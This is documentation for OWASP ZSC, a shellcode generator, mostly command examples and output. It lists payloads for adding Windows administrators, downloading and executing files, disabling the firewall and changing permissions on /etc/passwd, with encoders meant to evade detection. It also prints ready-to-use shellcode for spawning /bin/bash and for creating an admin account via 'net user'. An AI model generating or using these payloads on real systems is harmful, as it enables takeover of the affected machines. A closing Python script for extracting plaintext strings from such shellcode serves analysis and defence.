Command line ZSC

OWASP ZSC can generate shellcode directly from the command line, or you can use the interactive shell to drill down into the available payloads and explore their options and features. If you are not yet familiar with ZSC, we recommend trying the interactive shell first to learn more about the payloads' parameters and options.

Examples: zsc from the command line

To get a list of examples of how to use the command line, run:

zsc -e
[+] zsc.py --show-payloads
[+] zsc.py --show-payloads windows
[+] zsc.py -l php
[+] zsc.py --shell-storm search word1
[+] zsc.py -s search "word1 word2"
[+] zsc.py -s download id
[+] zsc.py -s download id -o shellcode.c
[+] zsc.py --payload windows_x86/system/mix_all --input "ls -la"
[+] zsc.py -p linux_x86/chmod/xor_random -i "/etc/passwd~~~777"
[+] zsc.py --payload osx_x86/system/none --input "ls -la" --assembly-code
[+] zsc.py -p linux_x86/write/inc -i "/etc/passwd~~~ali" -c
[+] zsc.py -p linux_x86/system/dec_15 -i "dir" --output shellcode.c
[+] zsc.py -p windows_x86/exec/add_0x4b5ff271 -i "calc.exe" -o shellcode.c
[+] zsc.py -p php/simple_hex -i "/path/file.php"

To get a complete list of all the available payloads, use the following command:

python zsc.py -l

This will output a complete list of all the features and options available:

[!] Note: Shellcode Payloads Sorted By OperatingSystem_Architecture/Function_Name/Encode_Name
[!] Note: Programming Languages Payloads Sorted By ProgrammingLanguagesName/Encode_Name

[!] system('command_to_execute')
[+] osx_x86/system/none

[!] chmod('file_to_perm','perm_number')
[+] osx_x86/chmod/none

[!] exec('file_to_execute')
[+] osx_x86/exec/none

[!] add_admin('username','password')
[+] windows_x86/add_admin/none
[+] windows_x86/add_admin/xor_random
[+] windows_x86/add_admin/add_random
[+] windows_x86/add_admin/sub_random
[+] windows_x86/add_admin/xor_yourvalue

[!] download_exec('url','filename')
[+] windows_x86/download_exec/none
[+] windows_x86/download_exec/xor_random
[+] windows_x86/download_exec/add_random
[+] windows_x86/download_exec/sub_random
[+] windows_x86/download_exec/xor_yourvalue

[!] exec('file_to_execute')
[+] windows_x86/exec/none
[+] windows_x86/exec/xor_random
[+] windows_x86/exec/add_random
[+] windows_x86/exec/sub_random
[+] windows_x86/exec/xor_yourvalue

[!] disable_firewall()
[+] windows_x86/disable_firewall/none
[+] windows_x86/disable_firewall/xor_random
[+] windows_x86/disable_firewall/add_random
[+] windows_x86/disable_firewall/sub_random
[+] windows_x86/disable_firewall/xor_yourvalue

[!] download_tofile('url','filename')
[+] windows_x86/download_tofile/none
[+] windows_x86/download_tofile/xor_random
[+] windows_x86/download_tofile/add_random
[+] windows_x86/download_tofile/sub_random
[+] windows_x86/download_tofile/xor_yourvalue

[!] create_file('filename','content')
[+] windows_x86/create_file/none
[+] windows_x86/create_file/xor_random
[+] windows_x86/create_file/add_random
[+] windows_x86/create_file/sub_random
[+] windows_x86/create_file/xor_yourvalue

[!] dir_create('directory_to_create')
[+] windows_x86/dir_create/none
[+] windows_x86/dir_create/xor_random
[+] windows_x86/dir_create/add_random
[+] windows_x86/dir_create/sub_random
[+] windows_x86/dir_create/xor_yourvalue

[!] download_execute('download_url','filename','command_to_execute')
[+] linux_x86/download_execute/none
[+] linux_x86/download_execute/xor_random
[+] linux_x86/download_execute/xor_yourvalue
[+] linux_x86/download_execute/add_random
[+] linux_x86/download_execute/add_yourvalue
[+] linux_x86/download_execute/sub_random
[+] linux_x86/download_execute/sub_yourvalue
[+] linux_x86/download_execute/inc
[+] linux_x86/download_execute/inc_timesyouwant
[+] linux_x86/download_execute/dec
[+] linux_x86/download_execute/dec_timesyouwant
[+] linux_x86/download_execute/mix_all

[!] write('file_to_write','content')
[+] linux_x86/write/none
[+] linux_x86/write/xor_random
[+] linux_x86/write/xor_yourvalue
[+] linux_x86/write/add_random
[+] linux_x86/write/add_yourvalue
[+] linux_x86/write/sub_random
[+] linux_x86/write/sub_yourvalue
[+] linux_x86/write/inc
[+] linux_x86/write/inc_timesyouwant
[+] linux_x86/write/dec
[+] linux_x86/write/dec_timesyouwant
[+] linux_x86/write/mix_all

[!] file_create('filename','content')
[+] linux_x86/file_create/none
[+] linux_x86/file_create/xor_random
[+] linux_x86/file_create/xor_yourvalue
[+] linux_x86/file_create/add_random
[+] linux_x86/file_create/add_yourvalue
[+] linux_x86/file_create/sub_random
[+] linux_x86/file_create/sub_yourvalue
[+] linux_x86/file_create/inc
[+] linux_x86/file_create/inc_timesyouwant
[+] linux_x86/file_create/dec
[+] linux_x86/file_create/dec_timesyouwant
[+] linux_x86/file_create/mix_all

[!] dir_create('directory_to_create')
[+] linux_x86/dir_create/none
[+] linux_x86/dir_create/xor_random
[+] linux_x86/dir_create/xor_yourvalue
[+] linux_x86/dir_create/add_random
[+] linux_x86/dir_create/add_yourvalue
[+] linux_x86/dir_create/sub_random
[+] linux_x86/dir_create/sub_yourvalue
[+] linux_x86/dir_create/inc
[+] linux_x86/dir_create/inc_timesyouwant
[+] linux_x86/dir_create/dec
[+] linux_x86/dir_create/dec_timesyouwant
[+] linux_x86/dir_create/mix_all

[!] exec('file_to_execute')
[+] linux_x86/exec/none
[+] linux_x86/exec/xor_random
[+] linux_x86/exec/xor_yourvalue
[+] linux_x86/exec/add_random
[+] linux_x86/exec/add_yourvalue
[+] linux_x86/exec/sub_random
[+] linux_x86/exec/sub_yourvalue
[+] linux_x86/exec/inc
[+] linux_x86/exec/inc_timesyouwant
[+] linux_x86/exec/dec
[+] linux_x86/exec/dec_timesyouwant
[+] linux_x86/exec/mix_all

[!] download('download_url','filename')
[+] linux_x86/download/none
[+] linux_x86/download/xor_random
[+] linux_x86/download/xor_yourvalue
[+] linux_x86/download/add_random
[+] linux_x86/download/add_yourvalue
[+] linux_x86/download/sub_random
[+] linux_x86/download/sub_yourvalue
[+] linux_x86/download/inc
[+] linux_x86/download/inc_timesyouwant
[+] linux_x86/download/dec
[+] linux_x86/download/dec_timesyouwant
[+] linux_x86/download/mix_all

[!] script_executor('name_of_script','name_of_your_script_in_your_pc','execute_to_command')
[+] linux_x86/script_executor/none
[+] linux_x86/script_executor/xor_random
[+] linux_x86/script_executor/xor_yourvalue
[+] linux_x86/script_executor/add_random
[+] linux_x86/script_executor/add_yourvalue
[+] linux_x86/script_executor/sub_random
[+] linux_x86/script_executor/sub_yourvalue
[+] linux_x86/script_executor/inc
[+] linux_x86/script_executor/inc_timesyouwant
[+] linux_x86/script_executor/dec
[+] linux_x86/script_executor/dec_timesyouwant
[+] linux_x86/script_executor/mix_all

[!] system('command_to_execute')
[+] linux_x86/system/none
[+] linux_x86/system/xor_random
[+] linux_x86/system/xor_yourvalue
[+] linux_x86/system/add_random
[+] linux_x86/system/add_yourvalue
[+] linux_x86/system/sub_random
[+] linux_x86/system/sub_yourvalue
[+] linux_x86/system/inc
[+] linux_x86/system/inc_timesyouwant
[+] linux_x86/system/dec
[+] linux_x86/system/dec_timesyouwant
[+] linux_x86/system/mix_all

[!] chmod('file_to_perm','perm_number')
[+] linux_x86/chmod/none
[+] linux_x86/chmod/xor_random
[+] linux_x86/chmod/xor_yourvalue
[+] linux_x86/chmod/add_random
[+] linux_x86/chmod/add_yourvalue
[+] linux_x86/chmod/sub_random
[+] linux_x86/chmod/sub_yourvalue
[+] linux_x86/chmod/inc
[+] linux_x86/chmod/inc_timesyouwant
[+] linux_x86/chmod/dec
[+] linux_x86/chmod/dec_timesyouwant
[+] linux_x86/chmod/mix_all

[!] python
[+] python/simple_hex
[+] python/simple_hex_rev
[+] python/simple_base64_rev


[!] javascript
[+] javascript/simple_hex
[+] javascript/base64
[+] javascript/simple_hex_rev
[+] javascript/simple_base64_rev


[!] ruby
[+] ruby/simple_hex
[+] ruby/base64
[+] ruby/simple_hex_rev
[+] ruby/base64_rev


[!] php
[+] php/simple_hex
[+] php/base64
[+] php/simple_hex_rev
[+] php/base64_rev


[!] perl
[+] perl/simple_hex
[+] perl/base64
[+] perl/simple_hex_rev
[+] perl/simple_base64_rev

Selecting a payload

Based on this menu, you can select a payload using the following command:

zsc -p osx_x86/exec/none -i /bin/bash

Here -p selects the payload and -i supplies the parameter input. When using parameters, be sure to enclose them in double quotes, as in "parameter1". If more parameters are required, join them with ~~~:

"parameter1~~~parameter2"

This will generate the following shellcode:

[+] Generated shellcode is:

\x68\x90\x90\x90\x68\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\x52\x51\x53\xb0\x3b\x6a\x2a\xcd\x80\xb0\x01\xb3\x01\xcd\x80

Another example with more parameters (add_admin requires username and password):

[!] add_admin('username','password')
[+] windows_x86/add_admin/none

The command line code:

zsc -p windows_x86/add_admin/none -i "mary~~~password"

Will create:

[+] Generated shellcode is:

\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x90\x90\x90\x64\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x68\x20\x2f\x61\x64\x68\x6d\x61\x72\x79\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x61\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x64\x64\x20\x26\x68\x64\x20\x2f\x61\x68\x73\x77\x6f\x72\x68\x20\x70\x61\x73\x68\x6d\x61\x72\x79\x68\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x5c\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0
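For anyone triaging such output, the `none` encoder leaves the input parameters in the bytes as plain ASCII immediates of x86 `push imm32` (opcode 0x68) instructions. The following is an added example, not part of ZSC or of the original page, that recovers those stack strings from the osx_x86/exec/none output shown above; the function names are illustrative and the scan is a heuristic, not a disassembler.

```python
import re

# Shellcode text printed by the osx_x86/exec/none example on this page.
SAMPLE = (
    r"\x68\x90\x90\x90\x68\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x2f\x62\x61\x73"
    r"\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\x52\x51\x53"
    r"\xb0\x3b\x6a\x2a\xcd\x80\xb0\x01\xb3\x01\xcd\x80"
)

PUSH_IMM32 = 0x68  # x86 opcode: push a 4-byte immediate


def parse_escaped(text):
    """Turn '\\x68\\x90...' text into bytes; reject anything else."""
    cleaned = "".join(text.split())
    if not re.fullmatch(r"(?:\\x[0-9a-fA-F]{2})*", cleaned):
        raise ValueError("input is not a pure \\xNN sequence")
    return bytes.fromhex(cleaned.replace("\\x", ""))


def is_printable(chunk):
    return all(0x20 <= b <= 0x7E for b in chunk)


def stack_strings(code, min_len=4):
    """Find runs of back-to-back 'push imm32' with printable immediates.
    The stack grows downward, so the last push holds the string's start."""
    found, run, i = [], [], 0

    def flush():
        if run:
            text = b"".join(reversed(run)).decode("ascii")
            if len(text) >= min_len:
                found.append(text)
            run.clear()

    while i < len(code):
        imm = code[i + 1:i + 5]
        if code[i] == PUSH_IMM32 and len(imm) == 4 and is_printable(imm):
            run.append(imm)
            i += 5
        else:
            flush()
            i += 1
    flush()
    return found


if __name__ == "__main__":
    # The trailing "h" of /bin/bash is built with shifts to avoid null
    # bytes, so this scan reports "/bin/bas" only.
    print(stack_strings(parse_escaped(SAMPLE)))
```

Run over the add_admin output above, the same scan surfaces the `net user` command line with its username and password in cleartext. The encoders in the payload list (xor, add, sub, inc, dec) transform these bytes, so a plain string scan like this one only covers the `none` variants.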
